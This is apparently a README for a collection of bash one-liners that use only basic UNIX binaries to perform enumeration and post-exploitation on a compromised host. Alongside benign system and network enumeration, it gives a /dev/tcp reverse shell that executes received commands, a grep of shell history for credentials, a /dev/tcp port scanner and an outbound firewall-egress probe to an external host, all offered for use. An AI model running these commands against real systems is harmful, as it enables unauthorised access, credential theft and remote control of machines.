An lcdbin is a lowest-common denominator binary - one which, with rare exceptions, should be present on any UNIX-based operating system. This repository is a collection of oneliners that use lcdbins to perform enumeration and post-exploitation activities that you'd normally use other tools for - such as id, netstat or python. Use them when you find yourself in a stripped-down environment where the usual tools aren't available.
Here is a list of the binaries used by the oneliners in this repository:
- awk
- bc
- cat
- echo
- grep
- ls
- printf
- read
- sed
- sort
Where possible, alternatives have been provided in case one binary is unavailable on your specific system; note that many of the commands below rely on procfs. Greetz to moogz for assistance and contributions.
Get kernel version information
cat /proc/version
cat /proc/sys/kernel/versionGet hostname
cat /proc/sys/kernel/hostnameGet current uid and gid
uid=$(cat /proc/self/status | awk -F'[ \t]' '{if(tolower($1) == "uid:") print $2 }'); gid=$(cat /proc/self/status | awk -F'[ \t]' '{if(tolower($1) == "gid:") print $2 }'); echo uid $uid gid $gidGet group membership for uid
uid=1000; user=$(awk -F : -v x="$uid" '{if($3==x) print $1}' /etc/passwd); grep $user /etc/groupList environment variables
sed 's/\x0/\n/g' /proc/self/environList information about processes
echo PID NAME UID GID; pids=$(ls /proc | grep '^[0-9]*$'); for pid in $pids; do name=$(cat /proc/$pid/status 2> /dev/null | awk -F'[ \t]' '{if(tolower($1) == "name:") print $2 }'); uid=$(cat /proc/$pid/status 2> /dev/null | awk -F'[ \t]' '{if(tolower($1) == "uid:") print $2 }'); gid=$(cat /proc/$pid/status 2> /dev/null | awk -F'[ \t]' '{if(tolower($1) == "gid:") print $2 }'); echo $pid $name $uid $gid; done;List mounted filesystems
cat /proc/self/mountsFind a filename without the find command
ls -R /etc 2> /dev/null | awk '/:$/&&f{s=$0;f=0}/:$/&&!f{sub(/:$/,"");s=$0;f=1;next}NF&&f{ print s"/"$0 }' | grep passwdSearch HISTFILE for credentials
x=(sql smbclient key pass user); for i in ${x[@]}; do grep -i "$i" $HISTFILE; doneGet local network interface addresses from /proc/net/fib_trie
awk '/32 host/ { print f } {f=$2}' /proc/net/fib_trie | sort -uParse listening TCP ports on /proc/net/tcp
for i in $(grep " 0A " /proc/net/tcp | awk -F "[ :]+" '{print $4}'); do printf "%d\n" "0x$i"; done | sort -un
for i in $(grep " 0A " /proc/net/tcp | awk -F "[ :]+" '{print $4}'); do echo "obase=10; ibase=16; $i" | bc; done | sort -unParse listening UDP ports on /proc/net/udp
for i in $(awk -F "[ :]+" '{if(NR >=2) print $4}' /proc/net/udp); do printf "%d\n" "0x$i"; done | sort -un
for i in $(awk -F "[ :]+" '{if(NR >=2) print $4}' /proc/net/udp); do echo "obase=10; ibase=16; $i" | bc; done | sort -unParse destination and gateway from /proc/net/route
echo Interface Destination Gateway; awk "NR >= 2" /proc/net/route |while read line; do printf '%s %d.%d.%d.%d %d.%d.%d.%d\n' $(echo $line | awk -F ' ' '{print $1}') $(echo $line | awk -F ' ' '{print $2}' | sed "s/../0x& /g" | awk '{ for (i=NF; i>1; i--) printf("%s ",$i); print $1; }') $(echo $line | awk -F ' ' '{print $3}' | sed "s/../0x& /g" | awk '{ for (i=NF; i>1; i--) printf("%s ",$i); print $1; }'); donePrint the ARP table
cat /proc/net/arpConnect to a port and execute the commands received (reverse shell)
exec 3<>/dev/tcp/127.0.0.1/31337; cat <&3 | sh >&3Use letmeoutofyour.net to check firewall ACLs for a port
exec 3<>/dev/tcp/letmeoutofyour.net/31337; echo -e "GET / HTTP/1.0\r\n\r\n" >&3; cat <&3 | grep w00tw00tUse dyndns.org to find your public IP address
exec 3<>/dev/tcp/checkip.dyndns.org/80; echo -e "GET / HTTP/1.0\r\n\r\n" >&3; cat <&3Scan TCP ports
for i in {1..9000}; do SERVER="127.0.0.1"; PORT=$i; (echo > /dev/tcp/$SERVER/$PORT) &> /dev/null && echo "Port $PORT seems to be open"; doneGet all IP addresses in a directory
grep -ro '[0-9]\{1,3\}\(\.[0-9]\{1,3\}\)\{3\}' /etc/* 2>/dev/null
grep -Ero '\b((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.|$)){4}\b' /etc/* 2>/dev/null